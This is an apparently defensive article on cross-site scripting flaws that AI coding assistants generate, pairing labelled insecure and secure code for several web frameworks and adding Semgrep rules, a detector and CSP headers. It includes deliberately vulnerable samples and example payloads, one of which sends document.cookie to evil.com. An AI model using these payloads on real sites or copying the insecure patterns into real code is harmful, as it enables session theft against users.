XSS Vulnerabilities from AI-Generated Code
Analysis of cross-site scripting patterns produced by LLM code generation, covering DOM XSS, reflected XSS, and framework-specific bypass patterns.
Overview
Cross-site scripting (XSS) is the second most common vulnerability class that LLMs introduce into generated code, after SQL injection. AI coding assistants frequently generate code that renders user input without proper encoding, uses innerHTML or dangerouslySetInnerHTML for dynamic content, and constructs HTML strings through template literals. These patterns create reflected, stored, and DOM-based XSS vulnerabilities.
The problem is particularly insidious because LLM-generated XSS often appears in code that is functionally correct. The application works as expected during manual testing, and only careful security review reveals that user input flows to the DOM without sanitization. This article catalogs the most common XSS patterns in AI-generated code and provides detection and prevention strategies.
Why LLMs Generate XSS
Training Data Bias
LLMs learn from publicly available code, tutorials, and documentation. XSS-vulnerable patterns dominate training data for the same reasons SQL injection does:
- Tutorial simplification: Tutorials often skip output encoding to focus on functionality.
- Legacy code prevalence: Older JavaScript and PHP code rarely uses modern XSS prevention.
- Framework escape hatches: React's dangerouslySetInnerHTML and Angular's bypassSecurityTrustHtml appear in documentation and tutorials about rendering rich content.
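The output-encoding step that tutorials skip is a one-liner. As a minimal illustration (using the standard library's html.escape rather than any particular framework's escaper), encoding turns markup metacharacters into inert entities:

```python
import html

# A payload that tutorial-style code would render verbatim into the page
payload = "<img src=x onerror=alert(1)>"

# Output encoding converts < and > into entities the browser will not parse as markup
encoded = html.escape(payload)
print(encoded)  # &lt;img src=x onerror=alert(1)&gt;
```

Template engines such as Jinja2 apply this same transformation automatically; the vulnerable patterns cataloged below all involve routing user input around that step.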
# Catalog of XSS patterns commonly generated by AI coding assistants
XSS_PATTERN_CATALOG = {
"innerHTML_assignment": {
"severity": "critical",
"frequency": "very_common",
"framework": "vanilla_js",
"insecure": '''
// LLM-generated: Display user search query
function displaySearchResults(query, results) {
document.getElementById("search-header").innerHTML =
`<h2>Results for: ${query}</h2>`;
// XSS: query is rendered directly as HTML
}
''',
"secure": '''
// Secure: Use textContent for plain text
function displaySearchResults(query, results) {
const header = document.getElementById("search-header");
const h2 = document.createElement("h2");
h2.textContent = `Results for: ${query}`;
header.replaceChildren(h2);
}
''',
"cwe": "CWE-79",
},
"react_dangerously_set": {
"severity": "critical",
"frequency": "common",
"framework": "react",
"insecure": '''
// LLM-generated: Render user bio with formatting
function UserBio({ bio }) {
return (
<div dangerouslySetInnerHTML={{ __html: bio }} />
);
// XSS: bio may contain script tags
}
''',
"secure": '''
// Secure: Use DOMPurify for sanitized HTML rendering
import DOMPurify from "dompurify";
function UserBio({ bio }) {
const sanitized = DOMPurify.sanitize(bio, {
ALLOWED_TAGS: ["b", "i", "em", "strong", "p", "br"],
ALLOWED_ATTR: [],
});
return (
<div dangerouslySetInnerHTML={{ __html: sanitized }} />
);
}
''',
"cwe": "CWE-79",
},
"flask_template_bypass": {
"severity": "critical",
"frequency": "common",
"framework": "flask",
"insecure": '''
# LLM-generated: Render user profile page
from flask import Flask, request
from markupsafe import Markup
app = Flask(__name__)
@app.route("/profile")
def profile():
name = request.args.get("name", "")
# LLM uses Markup() to "fix" escaping issues in templates
return f"<html><body><h1>Welcome, {Markup(name)}</h1></body></html>"
# XSS: Markup() marks the string as safe, bypassing auto-escaping
''',
"secure": '''
# Secure: Use Jinja2 templates with auto-escaping
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route("/profile")
def profile():
name = request.args.get("name", "")
# Jinja2 auto-escapes variables by default
return render_template_string(
"<html><body><h1>Welcome, {{ name }}</h1></body></html>",
name=name,
)
''',
"cwe": "CWE-79",
},
"django_mark_safe": {
"severity": "critical",
"frequency": "moderate",
"framework": "django",
"insecure": '''
# LLM-generated: Custom template tag
from django.utils.safestring import mark_safe
def render_user_content(content):
"""Render user-submitted content with formatting."""
# LLM uses mark_safe to suppress Django's auto-escaping
formatted = content.replace("\\n", "<br>")
return mark_safe(formatted)
# XSS: user content is marked safe without sanitization
''',
"secure": '''
# Secure: Escape first, then add safe formatting
from django.utils.html import escape
from django.utils.safestring import mark_safe
def render_user_content(content):
"""Render user-submitted content with formatting."""
# Escape user content first
escaped = escape(content)
# Then add safe formatting
formatted = escaped.replace("\\n", "<br>")
return mark_safe(formatted)
''',
"cwe": "CWE-79",
},
"jquery_html_method": {
"severity": "critical",
"frequency": "common",
"framework": "jquery",
"insecure": '''
// LLM-generated: Display notification
function showNotification(message) {
$("#notification").html(`<div class="alert">${message}</div>`);
// XSS: message rendered as HTML
}
''',
"secure": '''
// Secure: Use .text() for user content
function showNotification(message) {
const alert = $("<div>").addClass("alert").text(message);
$("#notification").empty().append(alert);
}
''',
"cwe": "CWE-79",
},
}
DOM-Based XSS from AI Code
URL Parameter to DOM Patterns
LLMs frequently generate code that reads URL parameters and inserts them into the DOM without encoding:
# Common DOM XSS patterns from LLMs
DOM_XSS_PATTERNS = {
"url_param_to_innerhtml": {
"code": '''
// LLM generates this for "read query param and display it"
const params = new URLSearchParams(window.location.search);
const name = params.get("name");
document.getElementById("greeting").innerHTML = `Hello, ${name}!`;
''',
"exploit": "?name=<img src=x onerror=alert(document.cookie)>",
"fix": "Use textContent instead of innerHTML",
},
"hash_to_dom": {
"code": '''
// LLM generates this for "single page app routing"
function loadPage() {
const page = window.location.hash.substring(1);
document.getElementById("content").innerHTML = `<h1>${page}</h1>`;
}
window.addEventListener("hashchange", loadPage);
''',
"exploit": "#<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)>",
"fix": "Validate hash against allowlist, use textContent",
},
"postmessage_to_dom": {
"code": '''
// LLM generates this for "receive messages from iframe"
window.addEventListener("message", (event) => {
document.getElementById("output").innerHTML = event.data;
});
''',
"exploit": "Parent frame sends HTML with script payload",
"fix": "Validate event.origin, use textContent, sanitize data",
},
}
JavaScript Template Literal Injection
LLMs commonly generate template literals that construct HTML, creating XSS sinks:
# Template literal XSS patterns
TEMPLATE_LITERAL_XSS = '''
// Pattern 1: Building HTML tables from data (very common LLM output)
function renderUserTable(users) {
// INSECURE: LLM builds HTML via template literals
const rows = users.map(user => `
<tr>
<td>${user.name}</td>
<td>${user.email}</td>
<td>${user.bio}</td>
</tr>
`).join("");
document.getElementById("user-table").innerHTML = `
<table>
<thead><tr><th>Name</th><th>Email</th><th>Bio</th></tr></thead>
<tbody>${rows}</tbody>
</table>
`;
// Any field containing HTML (especially bio) creates XSS
}
// SECURE: Use DOM APIs
function renderUserTableSafe(users) {
const table = document.createElement("table");
const thead = document.createElement("thead");
const headerRow = document.createElement("tr");
["Name", "Email", "Bio"].forEach(text => {
const th = document.createElement("th");
th.textContent = text;
headerRow.appendChild(th);
});
thead.appendChild(headerRow);
table.appendChild(thead);
const tbody = document.createElement("tbody");
users.forEach(user => {
const row = document.createElement("tr");
[user.name, user.email, user.bio].forEach(value => {
const td = document.createElement("td");
td.textContent = value; // Safe: textContent auto-escapes
row.appendChild(td);
});
tbody.appendChild(row);
});
table.appendChild(tbody);
const container = document.getElementById("user-table");
container.replaceChildren(table);
}
'''
Framework-Specific Patterns
React XSS Patterns
# React-specific XSS patterns from AI code generation
REACT_XSS_PATTERNS = {
"dangerouslySetInnerHTML_user_content": {
"frequency": "common",
"context": "LLMs suggest this for rendering formatted user content",
"insecure_code": '''
function Comment({ comment }) {
// LLM generates this when asked to "render markdown comments"
return (
<div className="comment">
<strong>{comment.author}</strong>
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
</div>
);
}
''',
"why_llm_suggests_this": (
"Training data contains many examples of rendering "
"HTML content with dangerouslySetInnerHTML. LLMs don't "
"distinguish between trusted and untrusted HTML."
),
},
"href_javascript_protocol": {
"frequency": "moderate",
"context": "LLMs generate user-controllable href attributes",
"insecure_code": '''
function UserLink({ user }) {
// LLM generates this for "link to user website"
return (
<a href={user.website}>Visit {user.name}'s site</a>
);
// XSS if user.website = "javascript:alert(document.cookie)"
}
''',
"secure_code": '''
function UserLink({ user }) {
// Validate URL protocol
const isValidUrl = (url) => {
try {
const parsed = new URL(url);
return ["http:", "https:"].includes(parsed.protocol);
} catch {
return false;
}
};
if (!isValidUrl(user.website)) return null;
return (
<a href={user.website} rel="noopener noreferrer">
Visit {user.name}'s site
</a>
);
}
''',
},
"style_injection": {
"frequency": "low",
"context": "LLMs generate dynamic styles from user input",
"insecure_code": '''
function ThemedComponent({ userTheme }) {
// LLM generates this for "custom theme support"
return (
<div style={{ background: userTheme.backgroundColor }}>
Content
</div>
);
// Style injection if userTheme comes from untrusted source
}
''',
},
}
Python Web Framework Patterns
# Flask and Django XSS patterns from AI code generation
from flask import Flask, request, render_template_string, jsonify
app = Flask(__name__)
# INSECURE Pattern 1: String-based HTML response (very common LLM output)
@app.route("/search")
def search_insecure():
"""LLM generates this for 'create a search endpoint'."""
query = request.args.get("q", "")
results = perform_search(query) # Assume this returns results
# LLM constructs HTML directly with f-strings
html = f"""
<html>
<body>
<h1>Search Results for: {query}</h1>
<ul>
{"".join(f"<li>{r}</li>" for r in results)}
</ul>
</body>
</html>
"""
return html # XSS: query and results rendered without escaping
# SECURE Pattern 1: Use Jinja2 templates
@app.route("/search")
def search_secure():
"""Secure version using Jinja2 auto-escaping."""
query = request.args.get("q", "")
results = perform_search(query)
# Jinja2 auto-escapes {{ }} variables
return render_template_string("""
<html>
<body>
<h1>Search Results for: {{ query }}</h1>
<ul>
{% for r in results %}
<li>{{ r }}</li>
{% endfor %}
</ul>
</body>
</html>
""", query=query, results=results)
# INSECURE Pattern 2: JSON response with HTML content
@app.route("/api/preview")
def preview_insecure():
"""LLM generates this for 'create content preview API'."""
content = request.json.get("content", "")
# LLM wraps content in HTML for preview
preview_html = f"<div class='preview'>{content}</div>"
return jsonify({"html": preview_html})
# XSS if frontend renders this HTML without sanitization
# SECURE Pattern 2: Return plain text, let frontend render safely
@app.route("/api/preview")
def preview_secure():
"""Secure version returning structured data."""
content = request.json.get("content", "")
return jsonify({
"text": content, # Frontend uses textContent to render
"word_count": len(content.split()),
})
def perform_search(query):
"""Placeholder search function."""
    return [f"Result for {query}"]
Detection Strategies
Semgrep Rules for LLM-Generated XSS
SEMGREP_XSS_RULES = """
rules:
- id: js-innerhtml-user-input
patterns:
- pattern: |
$EL.innerHTML = $VALUE
- pattern-not: |
$EL.innerHTML = ""
- pattern-not: |
$EL.innerHTML = DOMPurify.sanitize(...)
message: >
innerHTML assignment with potentially untrusted content.
Use textContent for plain text or DOMPurify.sanitize() for HTML.
AI coding assistants commonly generate this pattern.
languages: [javascript, typescript]
severity: WARNING
metadata:
cwe: CWE-79
- id: react-dangerously-set-innerhtml
pattern: |
dangerouslySetInnerHTML={{ __html: $VALUE }}
message: >
dangerouslySetInnerHTML used. Ensure $VALUE is sanitized with
DOMPurify. AI assistants frequently suggest this for rendering
formatted content.
languages: [javascript, typescript]
severity: ERROR
metadata:
cwe: CWE-79
- id: flask-fstring-html-response
patterns:
- pattern: |
return f"<...$VAR..."
message: >
Flask endpoint returns f-string containing HTML. Use
render_template or render_template_string with Jinja2
auto-escaping instead.
languages: [python]
severity: ERROR
metadata:
cwe: CWE-79
- id: django-mark-safe-user-input
patterns:
- pattern: |
mark_safe($TAINTED)
- pattern-not: |
mark_safe(escape($TAINTED))
message: >
mark_safe() called on potentially unsanitized input.
Escape content before marking safe. AI assistants use
mark_safe to suppress escaping without understanding the risk.
languages: [python]
severity: ERROR
metadata:
cwe: CWE-79
- id: js-document-write
pattern: document.write(...)
message: >
document.write() with dynamic content creates XSS risk.
Use DOM APIs instead. AI coding assistants generate this
for legacy-style code.
languages: [javascript]
severity: WARNING
metadata:
cwe: CWE-79
"""
Automated XSS Testing for AI-Generated Code
import ast
import sys
from pathlib import Path
class FlaskXSSDetector(ast.NodeVisitor):
"""Detect XSS patterns in Flask applications generated by AI."""
def __init__(self, filename: str):
self.filename = filename
self.findings: list[dict] = []
def visit_Return(self, node: ast.Return):
"""Check return statements for HTML string construction."""
if node.value is None:
return
# Detect f-string returns with HTML
if isinstance(node.value, ast.JoinedStr):
for value in node.value.values:
if isinstance(value, ast.Constant) and isinstance(value.value, str):
if "<" in value.value and ">" in value.value:
self.findings.append({
"file": self.filename,
"line": node.lineno,
"type": "f-string HTML return",
"severity": "ERROR",
"message": "Return value constructs HTML via f-string. Use Jinja2 templates.",
})
return
self.generic_visit(node)
def visit_Call(self, node: ast.Call):
"""Check for mark_safe and Markup usage."""
if isinstance(node.func, ast.Name):
if node.func.id in ("mark_safe", "Markup"):
self.findings.append({
"file": self.filename,
"line": node.lineno,
"type": f"{node.func.id}() usage",
"severity": "WARNING",
"message": f"{node.func.id}() bypasses auto-escaping. Verify input is sanitized.",
})
self.generic_visit(node)
def scan_flask_xss(project_path: str) -> list[dict]:
"""Scan a Flask project for XSS vulnerabilities."""
all_findings = []
for py_file in Path(project_path).rglob("*.py"):
try:
source = py_file.read_text()
tree = ast.parse(source)
detector = FlaskXSSDetector(str(py_file))
detector.visit(tree)
all_findings.extend(detector.findings)
except (SyntaxError, UnicodeDecodeError):
pass
    return all_findings
Prevention Framework
Content Security Policy
In addition to code-level fixes, deploy Content Security Policy headers to limit XSS impact:
# Flask middleware for CSP headers
from flask import Flask
app = Flask(__name__)
@app.after_request
def add_security_headers(response):
"""Add security headers to mitigate XSS from AI-generated code."""
response.headers["Content-Security-Policy"] = (
"default-src 'self'; "
"script-src 'self'; "
"style-src 'self' 'unsafe-inline'; "
"img-src 'self' data:; "
"font-src 'self'; "
"connect-src 'self'; "
"frame-ancestors 'none'; "
"base-uri 'self'; "
"form-action 'self'"
)
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "DENY"
    response.headers["X-XSS-Protection"] = "0"  # Legacy header; 0 disables the buggy browser auditor
    return response
Developer Guidance for AI-Assisted Development
| Context | Insecure AI Pattern | Secure Alternative |
|---|---|---|
| Display user text | innerHTML = userText | textContent = userText |
| Render formatted content | dangerouslySetInnerHTML={{ __html: content }} | DOMPurify.sanitize(content) then dangerouslySetInnerHTML |
| Flask HTML response | return f"<html>...{user_input}..." | return render_template("page.html", input=user_input) |
| Django template | mark_safe(user_content) | escape(user_content) then mark_safe() |
| URL construction | href={user_url} | Validate protocol is http: or https: first |
| Build HTML table | Template literals with ${} | document.createElement() + textContent |
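The table's "escape first, then add trusted formatting" rule can be sketched framework-agnostically; here the standard library's html.escape stands in for Django's escape() or Jinja2's autoescaping:

```python
import html

def render_user_content(content: str) -> str:
    """Escape-then-format: the safe ordering for mixing user text with markup."""
    # Step 1: neutralize any markup in the user-supplied text
    escaped = html.escape(content)
    # Step 2: only then introduce formatting we control and trust
    return escaped.replace("\n", "<br>")

print(render_user_content("hi\n<script>alert(1)</script>"))
# hi<br>&lt;script&gt;alert(1)&lt;/script&gt;
```

Reversing the two steps (formatting before escaping) would escape our own &lt;br&gt; tags as well, which is why AI-generated code that notices the "broken" output often reaches for mark_safe() on the raw input instead — the insecure pattern shown earlier.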
References
- CWE-79: Improper Neutralization of Input During Web Page Generation — https://cwe.mitre.org/data/definitions/79.html
- "Do Users Write More Insecure Code with AI Assistants?" — Perry et al., Stanford University, 2023 — https://arxiv.org/abs/2211.03622
- OWASP Cross-Site Scripting Prevention Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html
- DOMPurify — https://github.com/cure53/DOMPurify
- Semgrep XSS Rules — https://semgrep.dev/p/xss
- React Security Best Practices — https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html